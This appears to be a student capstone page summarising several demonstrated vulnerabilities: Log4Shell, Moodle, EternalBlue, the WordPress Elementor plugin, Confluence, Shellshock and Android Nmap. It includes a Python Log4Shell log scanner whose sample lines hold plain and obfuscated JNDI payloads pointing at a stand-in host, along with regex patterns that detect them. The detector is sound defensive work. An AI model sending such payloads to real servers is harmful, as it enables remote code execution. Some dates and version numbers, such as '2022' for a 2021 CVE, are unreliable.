Winter 2023 CS Comps
Exploiting Security Vulnerabilities
Apache Log4J in 2 Minutes
CVE-2021-44228
Apache Log4J
A zero-day vulnerability discovered in 2022 in Apache Log4j that allows easy-to-exploit remote code execution in Java applications. Log4j is a popular Java-based logging utility widely used for generating log messages. An attacker can exploit CVE-2021-44228 by sending a specially crafted log message to a vulnerable application that uses Log4j.
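Since the attack is carried in the logged string itself, the defender's first check is to scan existing logs for the `${jndi:` lookup, including the nested-lookup obfuscations that hide the literal token. The following detector is an added example written for this page, not code from the project; the log lines and 203.0.113.x addresses are constructed samples.

```python
import re

# Constructed sample log lines (not from any real incident): a benign request,
# a plain probe, and two obfuscated probes using nested Log4j lookups.
SAMPLE_LOGS = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.9/a} HTTP/1.1" 404',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9/x}"',
]

# Innermost lookup forms used to hide the literal "jndi" token:
# ${lower:X} / ${upper:X} (case conversion) and ${name:-X} (default value).
_INNER_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"   # group 1: case-conversion lookup
    r"|\$\{[^${}]*:-([^${}]*)\}"         # group 2: default-value lookup
)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups from the inside out. The round limit keeps a
    hostile line from making the normaliser spin indefinitely."""
    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return bool(_JNDI.search(normalize_lookups(line)))


def scan(lines):
    """Return the indices of lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_LOGS):
        print(f"line {idx}: {SAMPLE_LOGS[idx]}")
```

A match only shows that a probe was logged; whether it succeeded depends on the Log4j version and JVM settings of the application that wrote the line.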
CVE-2020-25627, CVE-2020-14321,
CVE-2020-25629, CVE-2019-11631
Moodle
Moodle is our course management system. Here we demonstrated four vulnerabilities on Moodle 3.9, released on 5 June 2020, along with three opportunities you've missed if you are a senior/junior:
1: Log in as a teacher and change your grades
2: Become a site manager
3: Take over the system with a remote shell
Taking Over Moodle Demo
Windows 7 Eternal Blue Demo
CVE-2017-0144
Windows 7 EternalBlue
EternalBlue is a Windows exploit created by the National Security Agency (NSA) of the United States. NSA analysts spent a year hunting for a bug in Microsoft's software, and developed EternalBlue as part of their cyber-arsenal stockpile for (ostensibly) counterterrorism missions. In April 2017, the Shadow Brokers hacking group leaked it. It uses a flaw in the Microsoft implementation of the SMB protocol, which allows remote attackers to execute arbitrary code on a target system by sending crafted messages to the SMBv1 server.
CVE-2022-1329
WordPress
WordPress is a commonly used website builder with many third-party plugins available for download to extend its functionality. One of them, the Elementor plugin (versions 6.0.0 - 6.3.0), handles AJAX requests insecurely, which can result in the upload and execution of a .zip file containing arbitrary code, as long as its labels and headers appear correct.
WordPress Elementor Plugin Demo
Confluence OGNL Injection in 2 Minutes
CVE-2022-26134
Confluence
CVE-2022-26134 was a zero-day OGNL injection vulnerability discovered in the Atlassian Confluence Server and Data Center software. Confluence is a widely used collaboration and documentation tool (basically a wiki for your team). The vulnerability allows arbitrary remote code execution on a targeted server.
CVE-2014-6271
Shellshock
Bash is the default Unix shell for most Linux distributions. Shellshock is a Bash vulnerability first discovered in 2014, but the software had been vulnerable since 1989. Typical Shellshock exploits attempt remote command execution by telling Bash to assign an empty function declaration to an environment variable.
Shellshock Demo with Captions
Android Nmap Exploit Demo
CVE-2014-2630
Android Nmap
Nmap is a very common utility for network discovery and security auditing. When installed with high privilege levels, it can create exploitable issues within Linux kernel systems such as Android. Once a low-privilege shell has been obtained, attackers can use this exploit to escalate their privileges to those of Nmap, often resulting in root access.